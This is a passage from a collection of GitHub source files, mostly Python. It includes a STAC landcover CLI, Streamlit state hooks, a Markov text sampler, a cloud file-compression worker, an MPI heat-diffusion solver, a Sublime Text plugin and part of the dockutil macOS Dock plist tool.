url to the metadata jsonld\",\n default=JSONLD_HREF,\n )\n @click.option(\n \"-t\",\n \"--tile\",\n help=\"Tile the tiff into many smaller files.\",\n is_flag=True,\n default=False,\n )\n def build_full_collection_command(destination: str, source: str,\n metadata: str, tile: bool) -> None:\n \"\"\"Creates a STAC collection with Items and Assets\n\n Args:\n destination (str): Directory used to store the collection json\n source (str, optional): Path to a GeoTIF of the dataset\n metadata (str, optional): Path to a jsonld metadata file - provided by NRCan\n tile (bool, optional): Tile the tiff into many smaller files\n Returns:\n Callable\n \"\"\"\n # Create the COG from a GeoTIFF.\n # If a source TIFF is not provided, it will be downloaded to /tmp.\n # Enabling tiling will result in many smaller COGs.\n create_cog_command_fn(\n destination=destination,\n source=source,\n tile=tile,\n )\n # Create STAC Items for each COG.\n for cog_file in glob(f\"{destination}/*.tif\"):\n create_extent_asset_command_fn(\n destination=destination,\n cog=cog_file,\n metadata=metadata,\n )\n extent_file = os.path.join(\n destination,\n os.path.basename(cog_file).replace(\".tif\", \"_extent.geojson\"),\n )\n create_item_command_fn(\n destination=destination,\n cog=cog_file,\n extent_asset=extent_file,\n metadata=metadata,\n )\n # Create a STAC Collection.\n create_collection_command_fn(\n destination=destination,\n metadata=metadata,\n )\n\n return nrcanlandcover\n","repo_name":"stactools-packages/nrcan-landcover","sub_path":"src/stactools/nrcan_landcover/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"46327773773","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 20:25:00 2021\n\n@author: carolineskalla\n\"\"\"\n\ndef test10A15T():\n scores = []\n # scoreSet = set()\n numRuns= 100\n for i in range(numRuns):\n print(\"Run: \", i)\n s = simulation(2, 10, 15, 0.8, 0.1, 0.1)\n scores.append(s)\n #scoreSet.add(s)\n \n print(numRuns, \" Runs\") \n print(\"Scores:\")\n print(scores)\n # print(\"Unique scores: \", scoreSet)\n \n#test10A15T() \n ","repo_name":"Ilsze/ATAFD","sub_path":"Old Code/untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2033268174","text":"import inspect\nfrom typing import Callable, Generic, Optional, Tuple, TypeVar, Union, overload\n\nimport streamlit as st\n\nfrom encord_active.app.common.state import StateKey\n\nT = TypeVar(\"T\")\nReducer = Callable[[T], T]\n\n\ndef create_key():\n frames = inspect.stack()\n frame_keys = [\n f\"{frame.filename}:{frame.function}:{frame.lineno}\" for frame in frames if \"encord_active\" in frame.filename\n ]\n return str(hash(\"&\".join(frame_keys)))\n\n\ndef use_memo(initial: Callable[[], T], key: Optional[str] = None, clearable: bool = True) -> Tuple[T, Callable[[], T]]:\n key = key or create_key()\n scope = st.session_state.setdefault(StateKey.MEMO, {}) if clearable else st.session_state\n\n if key not in scope:\n scope[key] = initial()\n\n def refresh() -> T:\n scope[key] = initial()\n return scope[key]\n\n return scope[key], refresh\n\n\ndef use_lazy_state(initial: Callable[[], T], key: Optional[str] = None):\n key = key or create_key()\n scope = st.session_state.setdefault(StateKey.SCOPED, {})\n\n if key not in scope:\n scope[key] = initial()\n value: T = scope[key]\n\n return UseState(value, key)\n\n\nclass UseState(Generic[T]):\n def __init__(self, initial: T, key: Optional[str] = None, clearable=True) -> None:\n self._initial = initial\n self._key = key or create_key()\n self._scope = StateKey.SCOPED if clearable else StateKey.SCOPED_AND_PERSISTED\n st.session_state.setdefault(self._scope, {}).setdefault(self._key, initial)\n\n @overload\n def set(self, arg: T):\n ...\n\n @overload\n def set(self, arg: Reducer[T]):\n ...\n\n def set(self, arg: Union[T, Reducer[T]]):\n if callable(arg):\n new_value = arg(st.session_state[self._scope][self._key])\n else:\n new_value = arg\n\n if new_value == self.value:\n return\n\n st.session_state.setdefault(self._scope, {})[self._key] = new_value\n\n @property\n def value(self) -> T:\n return st.session_state.get(self._scope, {}).get(self._key, self._initial)\n","repo_name":"harry-esmart/encord-active","sub_path":"src/encord_active/app/common/state_hooks.py","file_name":"state_hooks.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"715636118","text":"import random\nimport sys\n\nfrom histogram import read_file, histogram_dictonary\n\n\n\n#create the sample list\n\n\ndef better_words(count, token_count, histogram):\n\n #get total number of words from selection\n sentence = \"\"\n while count > 0:\n #choose a random number in that range.\n rand_value = random.randint(0, token_count - 1)\n #keeps track of value\n total_count = 0\n\n #loop through list and add values to total count\n for key, value in histogram.items():\n\n if rand_value <= total_count:\n sentence += f\" {key}\"\n break\n\n total_count += value\n #decrement count\n count -= 1\n\n return sentence\n\n\n\n#choose word from list a certain count of times\ndef choose_words(count, words_list):\n count_list = list()\n count_histogram = dict()\n\n for i in range(count):\n count_list.append(random.choice(words_list))\n\n #add the list of word counts to dictonary\n for word in count_list:\n count_histogram[word] = count_histogram.get(word, 0) + 1\n\n return count_histogram\n\n\n\n\nif __name__ == \"__main__\":\n\n file_name = sys.argv[1]\n\n words = read_file(file_name)\n\n token_count = len(words)\n\n hist = histogram_dictonary(words)\n\n sentence = better_words(10, token_count, hist)\n\n print(sentence)\n","repo_name":"KingGenius5/Marxist-Markov","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22618081607","text":"from google.cloud import storage\nfrom google.cloud import pubsub_v1\nimport os\nimport shutil\nimport zipfile\nimport py7zr\nimport tarfile\nimport datetime\nfrom sqlalchemy import create_engine, Column, Integer, String, DateTime, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, declarative_base\n\nengine = create_engine('postgresql://postgres:contrasena123@/baseapp')\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n\nproject_id = \"\"\nsubscription_name = \"\"\nstorage_client = storage.Client()\nsubscriber = pubsub_v1.SubscriberClient()\nsubscription_path = subscriber.subscription_path(project_id, subscription_name)\n\nclass Tareas(Base):\n __tablename__ = 'tareas'\n id = Column(Integer, primary_key=True)\n timeStamp = Column(DateTime, default=datetime.datetime.utcnow)\n fileName = Column(String(500))\n newFormat = Column(String(100))\n status = Column(String(50))\n usuario = Column(Integer, ForeignKey('usuario.id'))\n \nclass Usuario(Base):\n __tablename__ = 'usuario'\n id = Column(Integer, primary_key=True)\n username = Column(String(50), unique=True)\n password = Column(String(100)) \n email = Column(String(100), unique=True)\n\ndef callback(message):\n tarea_id = message.data.decode(\"utf-8\")\n message.ack()\n \n print(f'START PROCESING... task with id {tarea_id}')\n tarea = session.get(Tareas, tarea_id)\n if tarea is None:\n return\n file_name = tarea.fileName\n new_format = tarea.newFormat\n if not os.path.exists('microservicio_worker/archivos/convertidos'):\n os.makedirs('microservicio_worker/archivos/convertidos')\n if not os.path.exists('microservicio_worker/archivos/originales'):\n os.makedirs('microservicio_worker/archivos/originales')\n \n try:\n print(f'DOWNLOADING... {file_name} from bucket')\n bucket_name = ''\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob('archivos/originales/{}'.format(file_name))\n blob.download_to_filename('microservicio_worker/archivos/originales/{}'.format(file_name))\n if new_format == 'ZIP':\n print(f'COMPRESSING... {file_name} to zip')\n file_path = os.path.join('microservicio_worker/archivos/originales', file_name)\n zip_file_path = os.path.join('microservicio_worker/archivos/convertidos', file_name + '.zip')\n with zipfile.ZipFile(zip_file_path, 'w', zipfile.ZIP_DEFLATED) as zip_file:\n zip_file.write(file_path, file_name)\n blob = bucket.blob(f'archivos/convertidos/{file_name}.zip')\n print(f'UPLOADING... {file_name}.zip to bucket') \n blob.upload_from_filename(zip_file_path)\n elif new_format == '7Z':\n print(f'COMPRESSING... {file_name} to 7z')\n file_path = os.path.join('microservicio_worker/archivos/originales', file_name)\n seven_zip_file_path = os.path.join('microservicio_worker/archivos/convertidos', file_name + '.7z')\n with py7zr.SevenZipFile(seven_zip_file_path, 'w') as seven_zip_file:\n seven_zip_file.write(file_path, file_name)\n print(f'UPLOADING... {file_name}.7z to bucket') \n blob = bucket.blob(f'archivos/convertidos/{file_name}.7z')\n blob.upload_from_filename(seven_zip_file_path)\n elif new_format == 'TAR.GZ':\n print(f'COMPRESSING... {file_name} to tar.gz')\n file_path = os.path.join('microservicio_worker/archivos/originales', file_name)\n tar_gz_file_path = os.path.join('microservicio_worker/archivos/convertidos', file_name + '.tar.gz')\n with tarfile.open(tar_gz_file_path, 'w:gz') as tar_gz_file:\n tar_gz_file.add(file_path, file_name)\n print(f'UPLOADING... {file_name}.tar.gz to bucket') \n blob = bucket.blob(f'archivos/convertidos/{file_name}.tar.gz')\n blob.upload_from_filename(seven_zip_file_path)\n else:\n tarea.status = 'failed'\n session.commit()\n shutil.rmtree('microservicio_worker/archivos')\n tarea.status = 'processed'\n session.commit()\n print(f'FINISH PROCESING... task with id {tarea_id}')\n print('--------------------o----------------------')\n except Exception as e:\n tarea.status = 'failed'\n session.commit()\n print(e)\n\nsubscriber.subscribe(subscription_path, callback=callback)\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)\n print('Servicio iniciado, esperando mensajes...')\n while True:\n pass\n","repo_name":"jorcasca/misw4204_cloud","sub_path":"Microservicios_Cloud/microservicio_worker/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"47527234126","text":"import sys\nimport os\n\nMAX_NUMBER_SIZE = 30\n\nEXIT_SUCCESS = 0\nEXIT_ERROR = 1\n\n# [COMMAND_START] all commands must be defined here \ndef average(parameters, variables_list):\n sum = 0\n for param in parameters:\n if param in variables_list:\n sum += variables_list[param] \n else:\n raise Exception(\"Error variable not found\")\n\n print(sum/len(parameters))\n\n return EXIT_SUCCESS\n\n# [COMMAND_END]\n\ndef parse_command(line, commands_list, variables_list):\n for command in commands_list:\n if line.startswith(command):\n parameters = line[len(command)+1:-1]\n parameters_list = parameters.split(\",\")\n\n return commands_list[command](parameters_list, variables_list)\n \n return EXIT_ERROR\n\ndef parse_variable(line, variables_list):\n variable_split = line.split(\"=\")\n if len(variable_split) == 2:\n if not variable_split[1].isdigit():\n raise Exception(\"Error variable not a numeric value\")\n elif len(variable_split[1]) > MAX_NUMBER_SIZE:\n raise Exception(\"Error variable value overflow\")\n\n variables_list[variable_split[0]] = long(variable_split[1])\n return EXIT_SUCCESS\n\n return EXIT_ERROR\n\ndef load_commands(commands_list):\n commands_list['average'] = average\n\n\ndef read_and_process(filename):\n variable_list = dict()\n command_list = dict()\n\n load_commands(command_list)\n\n ret = EXIT_SUCCESS\n\n if not os.path.exists(filename):\n print(\"Exception opening/reading/closing file\")\n return EXIT_ERROR\n\n\n line_count = 0\n with open(filename) as fp:\n try:\n for line in fp:\n line_count += 1\n line = line.strip()\n line = line.replace(\" \", \"\")\n if parse_variable(line, variable_list) != EXIT_SUCCESS and parse_command(line, command_list, variable_list) != EXIT_SUCCESS:\n raise Exception(\"Error variable or command not valid\") \n\n except Exception as ex:\n print(\"Line:\" + str(line_count) + \":\" + ex.message)\n ret = EXIT_ERROR\n\n return ret","repo_name":"rfribeiro/command-parser-project","sub_path":"command-parser-python/command_parser_python.py","file_name":"command_parser_python.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2656947248","text":"import struct\n\ndef float_to_hex(num):\n num_hex = hex(struct.unpack(' MAX_TEMP_ERROR ) and ( iteration < max_iterations ):\n\n for i in range( 1 , ROWS+1 ):\n for j in range( 1 , COLUMNS+1 ):\n temperature[ i , j ] = 0.25 * ( temperature_last[i+1,j] + temperature_last[i-1,j] +\n temperature_last[i,j+1] + temperature_last[i,j-1] )\n \n dt = 0\n\n for i in range( 1 , ROWS+1 ):\n for j in range( 1 , COLUMNS+1 ):\n dt = max( dt, temperature[i,j] - temperature_last[i,j])\n temperature_last[ i , j ] = temperature [ i , j ]\n\n dt_global=MPI.COMM_WORLD.reduce(dt, op=MPI.MAX, root=0)\n dt_global=MPI.COMM_WORLD.bcast(dt_global, root=0)\n \n #send down\n if (my_pe_num!=lar_pe):\n MPI.COMM_WORLD.send(temperature[ROWS][:], dest=my_pe_num+1, tag=2)\n \n #receive up \n if (my_pe_num!=0):\n temperature_last[0][:] = MPI.COMM_WORLD.recv(source=my_pe_num-1, tag=2)\n \n #send up\n if (my_pe_num!=0):\n MPI.COMM_WORLD.send(temperature[1][:], dest=my_pe_num-1, tag=1)\n \n #receive down\n if (my_pe_num!=lar_pe):\n temperature_last[ROWS+1][:] = MPI.COMM_WORLD.recv(source=my_pe_num+1, tag=1)\n\n iteration += 1\n \n MPI.COMM_WORLD.barrier()\n\n\n#send all the temperature_last to pe_0\nif (my_pe_num!= 0):\n MPI.COMM_WORLD.send(temperature_last, dest=0, tag=0)\n\n\n#concatenate together\nif my_pe_num==0:\n temperature_last=np.array(temperature_last[0:ROWS+1][:])\n \n for i in range(1,lar_pe):\n result=MPI.COMM_WORLD.recv(source=i, tag=0)\n temperature_last=np.concatenate((temperature_last,np.array(result)[1:ROWS+1,:]))\n\n result=MPI.COMM_WORLD.recv(source=lar_pe, tag=0)\n \n temperature_last=np.concatenate((temperature_last,np.array(result)[1:ROWS+2,:]))\n \n time.sleep(1)\n end = time.time()\n\n print(f\"total runtime of the program is {end - begin}\")\n print(f\"total iteration is {iteration}\")\n \n output(temperature_last)\n# plate = np.fromfile(\"plate.out\", dtype=float).reshape((ROWS_Global+2,COLUMNS+2))\n# plt.imshow(plate, norm=matplotlib.colors.LogNorm(0.1,50,clip=True))\n# plt.show()\n\n","repo_name":"tianhanl0/Parallelizing-Laplace-on-steady-state-heat-metal-with-MPI","sub_path":"laplace.py","file_name":"laplace.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22161257624","text":"\"\"\"\nBased off of http://www.sublimetext.com/forum/viewtopic.php?t=8677,\nand I see no license there so AFAIK you need to ask there any time you\neven think about doing anything to this source. Or you can just duck\nand hope, like I have.\n\nMy changes are hereby released completely and irrevocably into the\nPublic Domain. THE ORIGINAL CODE MAY NOT BE PUBLIC DOMAIN AND THUS\nTHIS CODE SHOULD NOT BE THOUGHT OF AS PUBLIC DOMAIN.\n\n- Joshua Landau \n\"\"\"\n\nimport sublime, sublime_plugin\n\nclass RunMultipleCommandsCommand(sublime_plugin.TextCommand):\n \"\"\"\n \"args\" for this takes _either_ \"command\" or \"commands\", where\n \"commands\" is a list of what \"command\" takes. \"args\" also takes\n an optional \"times\" parameter, and just runs itself that many\n times.\n\n \"command\" takes either a string (such as \"store_selections\") or\n a dictionary with a \"command\" attribute, an optional \"args\"\n attribute and an optional \"context\" attribute.\n\n In the above, the \"command\" and \"args\" attribute are as expected,\n and the \"context\" attribute is one of \"window\", \"app\" and \"text\".\n \"\"\"\n def run(self, edit, commands=None, command=None, times=1):\n if commands is None:\n commands = [command] if command is not None else []\n\n for _ in range(times):\n for command in commands:\n self.exec_command(command)\n\n\n def exec_command(self, command):\n # Shortcut for simple command described by one string\n if not \"command\" in command:\n if isinstance(command, str):\n command = {\"command\": command}\n\n else:\n raise ValueError(\"No command name provided.\")\n\n args = command.get(\"args\")\n\n contexts = {\"window\": self.view.window(), \"app\": sublime, \"text\": self.view}\n context = contexts[command.get(\"context\", \"text\")]\n\n context.run_command(command[\"command\"], args)\n","repo_name":"guoyu07/EthanDENG","sub_path":"WordPress/Posts/Tools/Sublime_multi_keybindings/run_multiple_commands.py","file_name":"run_multiple_commands.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6703724068","text":"import sys, plistlib, subprocess, os, getopt, re, pipes, tempfile, pwd, logging\nimport platform\n\nimport utils\n\nlog = logging.getLogger()\n\n# default verbose printing to off\nverbose = False\nversion = '2.0.2'\n\n\ndef usage(e=None):\n \"\"\"Displays usage information and error if one occurred\"\"\"\n\n print(\"\"\"usage: %(progname)s -h\nusage: %(progname)s --add | [--label
tab\n %(progname)s --list --homeloc /Volumes/RAID/Homes --allhomes\n\n The following adds Firefox after Safari in the Default User Template without restarting the Dock\n %(progname)s --add /Applications/Firefox.app --after Safari --no-restart '/System/Library/User Template/English.lproj'\n\n The following restarts the dock, usefull after calling multiple --add/remove with --on-restart\n %(progname)s --restart\n\n\nNotes:\n When specifying a relative path like ~/Documents with the --allhomes option, ~/Documents must be quoted like '~/Documents' to get the item relative to each home\n\nBugs:\n Names containing special characters like accent marks will fail\n\n\nContact:\n Send bug reports and comments to kcrwfrd at gmail.\n\"\"\" % dict(progname = os.path.basename(sys.argv[0])))\n if e:\n print(\"\")\n print('Error processing options:', e)\n return 1\n return 0\n\n\ndef verboseOutput(*args):\n \"\"\"Used by verbose option (-v) to send more output to stdout\"\"\"\n if verbose:\n try:\n log.debug(\"verbose:\", args)\n except Exception:\n pass\n\n\ndef dock_util(args):\n \"\"\"Parses options and arguments and performs functions\"\"\"\n # setup our getoput opts and args\n try:\n (optargs, args) = getopt.getopt(args, 'hv', [\"help\", \"version\",\n \"section=\", \"list\", \"find=\", \"add=\", \"move=\", \"replacing=\",\n \"remove=\", \"after=\", \"before=\", \"position=\", \"display=\", \"view=\",\n \"sort=\", \"label=\", \"type=\", \"allhomes\", \"homeloc=\", \"no-restart\", \"restart\", \"hupdock=\"])\n except getopt.GetoptError as e: # if parsing of options fails, display usage and parse error\n return usage(e)\n\n # setup default values\n global verbose\n add_path = None\n remove_labels = []\n find_label = None\n move_label = None\n after_item = None\n before_item = None\n position = None\n add_path = None\n plist_path = None\n list = False\n all_homes = False\n replace_label = None\n section = None\n display_as = None\n show_as = None\n arrangement = None\n tile_type = None\n label_name = None\n home_directories_loc = '/Users'\n restart_dock = True\n explicit_restart = False\n\n for opt, arg in optargs:\n if opt in (\"-h\", \"--help\"):\n usage()\n elif opt == \"-v\":\n verbose = True\n elif opt == \"--version\":\n print(version)\n return 0\n elif opt == \"--add\":\n add_path = arg\n elif opt == \"--replacing\":\n replace_label = arg\n elif opt == \"--move\":\n move_label = arg\n elif opt == \"--find\":\n find_label = arg\n elif opt == \"--remove\":\n remove_labels.append(arg)\n elif opt == \"--after\":\n after_item = arg\n elif opt == \"--before\":\n before_item = arg\n elif opt == \"--position\":\n position = arg\n elif opt == \"--label\":\n label_name = arg\n elif opt == '--sort':\n if arg == 'name':\n arrangement = 1\n elif arg == 'dateadded':\n arrangement = 2\n elif arg == 'datemodified':\n arrangement = 3\n elif arg == 'datecreated':\n arrangement = 4\n elif arg == 'kind':\n arrangement = 5\n else:\n usage('unsupported --sort argument')\n elif opt == '--view':\n if arg == 'fan':\n show_as = 1\n elif arg == 'grid':\n show_as = 2\n elif arg == 'list':\n show_as = 3\n elif arg == 'auto':\n show_as = 0\n else:\n usage('unsupported --view argument')\n elif opt == '--display':\n if arg == 'stack':\n display_as = 0\n elif arg == 'folder':\n display_as = 1\n else:\n usage('unsupported --display argument')\n elif opt == '--type':\n tile_type = arg+'-tile'\n elif opt == '--section':\n section = 'persistent-'+arg\n elif opt == '--list':\n list = True\n elif opt == '--allhomes':\n all_homes = True\n elif opt == '--homeloc':\n home_directories_loc = arg\n elif opt == '--no-restart':\n restart_dock = False\n elif opt == '--restart':\n explicit_restart = True\n # for legacy compatibility only\n elif opt == '--hupdock':\n if arg.lower() in (\"false\", \"no\", \"off\", \"0\"):\n restart_dock = False\n\n # check for an action\n if add_path is None and not remove_labels and move_label is None and find_label is None and list == False and explicit_restart == False:\n usage('no action was specified')\n\n if explicit_restart:\n restart_the_dock()\n return 0\n\n # get the list of plists to process\n # if allhomes option was set, get a list of home directories in the homedirectory location\n if all_homes:\n possible_homes = os.listdir(home_directories_loc)\n plist_paths = [ home_directories_loc+'/'+home+'/Library/Preferences/com.apple.dock.plist' for home in possible_homes if os.path.exists(home_directories_loc+'/'+home+'/Library/Preferences/com.apple.dock.plist') and os.path.exists(home_directories_loc+'/'+home+'/Desktop')]\n else: # allhomes was not specified\n # if no plist argument, then use the user's home directory dock plist, otherwise use the arguments provided\n if not args:\n plist_paths = [ os.path.expanduser('~/Library/Preferences/com.apple.dock.plist') ]\n else:\n plist_paths = args\n # exit if we couldn't find any plists to process\n if len(plist_paths) < 1:\n print('no dock plists were found')\n return 1\n\n # loop over plist paths\n for plist_path in plist_paths:\n\n verboseOutput('processing', plist_path)\n # a home directory is allowed as an argument, so if the plist_path is a\n # directory, we append the relative path to the plist\n if os.path.isdir(plist_path):\n plist_path = os.path.join(plist_path,'Library/Preferences/com.apple.dock.plist')\n\n # verify that the plist exists at the given path\n # and expand and quote it for use when shelling out\n if os.path.exists(os.path.expanduser(plist_path)):\n plist_path = os.path.expanduser(plist_path)\n plist_path = os.path.abspath(plist_path)\n plist_path = pipes.quote(plist_path)\n else:\n print(plist_path, 'does not seem to be a home directory or a dock plist')\n return 1\n\n # check for each action and process accordingly\n if remove_labels: # --remove action(s)\n pl = readPlist(plist_path)\n changed = False\n for remove_label in remove_labels:\n if removeItem(pl, remove_label):\n changed = True\n else:\n print('item', remove_label, 'was not found in', plist_path)\n if changed:\n commitPlist(pl, plist_path, restart_dock)\n elif list: # --list action\n pl = readPlist(plist_path)\n # print a tab separated line for each item in the plist\n # for each section\n for section in ['persistent-apps', 'persistent-others']:\n # for item in section\n for item in pl[section]:\n try:\n # join and print relevant data into a string separated by tabs\n print('\\t'.join((item['tile-data']['file-label'], item['tile-data']['file-data']['_CFURLString'], section, plist_path)))\n except Exception:\n pass\n\n elif find_label is not None: # --find action\n # since we are only reading the plist, make a copy before converting it to be read\n pl = readPlist(plist_path)\n # set found state\n item_found = False\n # loop through dock items looking for a match with provided find_label\n for section in ['persistent-apps', 'persistent-others']:\n for item_offset in range(len(pl[section])):\n try:\n if pl[section][item_offset]['tile-data']['file-label'] == find_label:\n item_found = True\n print(find_label, \"was found in\", section, \"at slot\", item_offset+1, \"in\", plist_path)\n except Exception:\n pass\n if not item_found:\n print(find_label, \"was not found in\", plist_path)\n if not all_homes: # only exit non-zero if we aren't processing all homes, because for allhomes, exit status for find would be irrelevant\n return 1\n\n elif move_label is not None: # --move action\n pl = readPlist(plist_path)\n # check for a position option before processing\n if position is None and before_item is None and after_item is None:\n usage('move action requires a position destination')\n # perform the move and save the plist if it was successful\n if moveItem(pl, move_label, position, before_item, after_item):\n commitPlist(pl, plist_path, restart_dock)\n else:\n print('move failed for', move_label, 'in', plist_path)\n\n elif add_path is not None: # --add action\n if add_path.startswith('~'): # we've got a relative path and relative paths need to be processed by using a path relative to this home directory\n real_add_path = re.sub('^~', plist_path.replace('/Library/Preferences/com.apple.dock.plist',''), add_path) # swap out the full home path for the ~\n else:\n real_add_path = add_path\n # determine smart default values where possible\n if section is None:\n if real_add_path.endswith('.app') or real_add_path.endswith('.app/'): # we've got an application\n section = 'persistent-apps'\n elif display_as is not None or show_as is not None or arrangement is not None: # we've got a folder\n section = 'persistent-others'\n\n if tile_type is None: # if type was not specified, we try to figure that out using the filesystem\n if os.path.isdir(real_add_path) and section != 'persistent-apps': # app bundles are directories too\n tile_type = 'directory-tile'\n elif re.match('\\w*://', real_add_path): # regex to determine a url in the form xyz://abcdef.adsf.com/adsf\n tile_type = 'url-tile'\n section = 'persistent-others'\n else:\n tile_type = 'file-tile'\n\n if section is None:\n section = 'persistent-others'\n\n if tile_type != 'url-tile': # paths can't be relative in dock items\n real_add_path = os.path.realpath(real_add_path)\n\n pl = readPlist(plist_path)\n verboseOutput('adding', real_add_path)\n # perform the add save the plist if it was successful\n if addItem(pl, real_add_path, replace_label, position, before_item, after_item, section, display_as, show_as, arrangement, tile_type, label_name):\n commitPlist(pl, plist_path, restart_dock)\n else:\n print('item', add_path, 'was not added to Dock')\n if not all_homes: # only exit non-zero if we aren't processing all homes, because for allhomes, exit status for add would be irrelevant\n return 1\n return 0\n\n# NOTE on use of defaults\n# We use defaults because it knows how to handle cfpreferences caching even when given a path rather than a domain\n# This allows us to keep using path-based plist specifications rather than domains\n# Preserving path based plists are important for people needing to run this on a non boot volume\n# However if Apple stops using plists or moves the plist path, all of this will break\n# So at that point we will have to change the API so users pass in a defaults domain or user rather than a plist path\ndef writePlist(pl, plist_path):\n \"\"\"writes a plist object down to a file\"\"\"\n # get the unescaped path\n ###plist_path = path_as_string(plist_path)\n # get a tempfile path for writing our plist\n plist_import_path = tempfile.mktemp()\n # Write the plist to our temporary plist for importing because defaults can't import from a pipe (yet)\n plistlib.writePlist(pl, plist_import_path)\n # get original permissions\n plist_stat = os.stat(plist_path)\n # If we are running as root, ensure we run as the correct user to update cfprefsd\n if os.geteuid() == 0:\n # Running defaults as the user only works if the user exists\n if valid_uid(plist_stat.st_uid):\n subprocess.Popen(['sudo', '-u', '#%d' % plist_stat.st_uid, '-g', '#%d' % plist_stat.st_gid, 'defaults', 'import', plist_path, plist_import_path])\n else:\n subprocess.Popen(['defaults', 'import', plist_path, plist_import_path])\n os.chown(plist_path, plist_stat.st_uid, plist_stat.st_gid)\n os.chmod(plist_path, plist_stat.st_mode)\n else:\n subprocess.Popen(['defaults', 'import', plist_path, plist_import_path])\n\n\ndef valid_uid(uid):\n \"\"\"returns bool of whether uid can be resolved to a user\"\"\"\n try:\n pwd.getpwuid(uid)\n return True\n except Exception:\n return False\n\n\ndef getOsxVersion():\n \"\"\"returns a tuple with the (major,minor,revision) numbers\"\"\"\n # OS X Yosemite return 10.10, so we will be happy with len(...) == 2, then add 0 for last number\n try:\n mac_ver = tuple(int(n) for n in platform.mac_ver()[0].split('.'))\n assert 2 <= len(mac_ver) <= 3, f\"Bac mac_ver format {mac_ver}\"\n except Exception as e:\n raise e\n if len(mac_ver) == 2:\n mac_ver = mac_ver + (0, )\n return mac_ver\n\n\ndef readPlist(plist_path):\n \"\"\"returns a plist object read from a file path\"\"\"\n # get the unescaped path\n ###plist_path = path_as_string(plist_path)\n # get a tempfile path for exporting our defaults data\n export_fifo = tempfile.mktemp()\n # make a fifo for defaults export in a temp file\n os.mkfifo(export_fifo)\n # export to the fifo\n osx_version = getOsxVersion()\n if osx_version[1] >= 9:\n subprocess.Popen(['defaults', 'export', plist_path, export_fifo]).communicate()\n # convert the export to xml\n plist_string = subprocess.Popen(['plutil', '-convert', 'xml1', export_fifo, '-o', '-'], stdout=subprocess.PIPE).stdout.read()\n else:\n try:\n cmd = ['/usr/libexec/PlistBuddy','-x','-c', 'print',plist_path]\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n (plist_string,err) = proc.communicate()\n except Exception as e:\n raise e\n # parse the xml into a dictionary\n pl = plistlib.readPlistFromBytes(plist_string)\n return pl\n\n\ndef path_as_string(path):\n \"\"\"returns an unescaped string of the path\"\"\"\n return subprocess.Popen('ls -d '+path, shell=True, stdout=subprocess.PIPE).stdout.read().rstrip('\\n')\n\n\ndef moveItem(pl, move_label=None, position=None, before_item=None, after_item=None):\n \"\"\"locates an existing dock item and moves it to a new position\"\"\"\n for section in ['persistent-apps', 'persistent-others']:\n item_to_move = None\n # loop over the items looking for the item label\n for item_offset in range(len(pl[section])):\n if pl[section][item_offset]['tile-data']['file-label'] == move_label:\n item_found = True\n verboseOutput('found', move_label)\n # make a copy of the found dock entry\n item_to_move = pl[section][item_offset]\n found_offset = item_offset\n break\n else:\n verboseOutput('no match for', pl[section][item_offset]['tile-data']['file-label'])\n # if the item wasn't found, continue to next section loop iteration\n if item_to_move is None:\n continue\n # we are still inside the section for loop\n # remove the found item\n pl[section].remove(pl[section][item_offset])\n\n # figure out where to re-insert the original dock item back into the plist\n if position is not None:\n if position in [ 'beginning', 'begin', 'first' ]:\n pl[section].insert(0, item_to_move)\n return True\n elif position in [ 'end', 'last' ]:\n pl[section].append(item_to_move)\n return True\n elif position in [ 'middle', 'center' ]:\n midpoint = int(len(pl[section])/2)\n pl[section].insert(midpoint, item_to_move)\n return True\n else:\n # if the position integer starts with a + or - , then add or subtract from its current position respectively\n if position.startswith('-') or position.startswith('+'):\n new_position = int(position) + found_offset\n if new_position > len(pl[section]):\n pl[section].append(item_to_move)\n elif new_position < 0:\n pl[section].insert(0, item_to_move)\n else:\n pl[section].insert(int(position) + found_offset, item_to_move)\n return True\n\n try:\n int(position)\n except Exception:\n print('Invalid position', position)\n return False\n pl[section].insert(int(position)-1, item_to_move)\n return True\n elif after_item is not None or before_item is not None:\n # if after or before is set, find the offset of that item and do the insert relative to that offset\n for item_offset in range(len(pl[section])):\n try:\n if after_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == after_item:\n pl[section].insert(item_offset+1, item_to_move)\n return True\n if before_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == before_item:\n pl[section].insert(item_offset, item_to_move)\n return True\n except KeyError:\n pass\n\n return False\n\n\ndef generate_guid():\n \"\"\"returns guid string\"\"\"\n return subprocess.Popen(['/usr/bin/uuidgen'],stdout=subprocess.PIPE).communicate()[0].rstrip()\n\n\ndef addItem(pl, add_path, replace_label=None, position=None, before_item=None, after_item=None, section='persistent-apps', display_as=1, show_as=1, arrangement=2, tile_type='file-tile',label_name=None):\n \"\"\"adds an item to an existing dock plist object\"\"\"\n if display_as is None:\n display_as = 1\n if show_as is None:\n show_as = 0\n if arrangement is None:\n arrangement = 2\n\n # fix problems with unicode file names\n enc = (sys.stdin.encoding if sys.stdin.encoding else 